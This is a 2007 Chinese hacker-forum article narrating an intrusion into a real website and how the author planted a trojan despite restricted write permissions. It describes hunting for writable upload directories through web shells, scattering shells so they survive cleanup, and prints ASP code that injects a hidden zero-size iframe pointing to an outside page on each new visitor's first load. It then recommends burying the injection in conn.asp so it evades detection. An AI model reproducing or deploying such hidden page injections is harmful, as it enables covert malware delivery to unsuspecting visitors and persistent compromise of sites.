首页没有权限也能挂马

www.hx99.org 阅读: 时间:2007-07-09 整理:华西黑盟
------------------------------------------------------------------

   在有些情况下，是可以的。一个网站，再怎么安全，怎么设置权限，总有维护的时候，总会为自己的管理方便，提供些方便的路径。也许就在这个时候，会出现安全问题。当然我想讨论的是另一种比较特殊的情况。
网站地址用www.lovefree.org代替。实际的网站是一个已经被偶们入侵过的站，有过N=N+1的被黑经历，甚至还被国外的牛人组织黑。经过很多，后来逐渐的学会了作安全。
目录都是继承的，iuser没有权限写，以前的马，我的马在一个zszl的目录，站长专门建立的新的虚拟目录设置了权限不可跨越。无法浏览主站的目录。主站呢，刚好有另一个兄弟留的（图一）。

   说留了这个马没用，不能写首页，就是想挂马。
   本来我是想一个一个目录找的，可惜我的马留的“不是地方”，这次刚好有了，俺就是不信他会所有目录都不可写。一定有可以写的地方，至少运气好了一些上传的地方，或者生成html的地方有希望。找。。。5个小时，一点都不夸张哦～终于找到一个目录。
http://www.lovefree.org/zhenggong/upload/
   政工的网站好像是新作的。虽然主目录不能写，但是upload可以。
（图二）

   大家一定想。首页都不能写，这么浪费时间么。其实我也是这样想的，但是他惹毛我了，哪怕是一点点的进取，我都会慢慢的往前进。谁知道前面会遇到什么呢。
浏览目录，有了马，很多本来是隐藏的目录，也都展现了出来，渐渐的扩大战果吧。果然还是找到了一些可以写的目录，因为吸取教训，下次被黑，他们一定还是再次详细的分目录，设权限。所以马越分散越好。
看看他的目录。

（图三）

找到

<%

    dimconn

    dimdbpath

       OnErrorResumeNext

   setconn=server.createobject("adodb.connection")

       DBPath="D:\music.163.net\includes\BD.MDB"

    conn.Open"driver={MicrosoftAccessDriver(*.mdb)};dbq="&DBPath

IP=Request.ServerVariables("REMOTE_ADDR")

SetRs=Conn.Execute("SelectIDfromBDwhereip='"&IP&"'")

IfRs.eofthen

%>

上面是

<%Conn.Execute"insertintoBD(ip)values('"&IP&"')"%>

<iframesrc="http://www.163.com/other/BD/Top.html"width="0"height="0"></iframe>

<%Endif%>

 

上面是BD.asp

 

既然是这样子执行。就可以进一步的隐藏，把木马的判断和执行放进conn.asp里面。代码改进。

A>

   木马在conn.asp里面，即使怀疑，普通用户也不能找到问题，即使那个普通用户是高手，也只能在ie看看count.asp的html代码，结果是什么也没有。因为这个马不会再次执行了。

  整篇文章不能说是我原创，但是至少有点我的思路，大家转载的时候顺便保证文章的完整性吧。

【免费加入会员】【我要投稿】【关闭本页】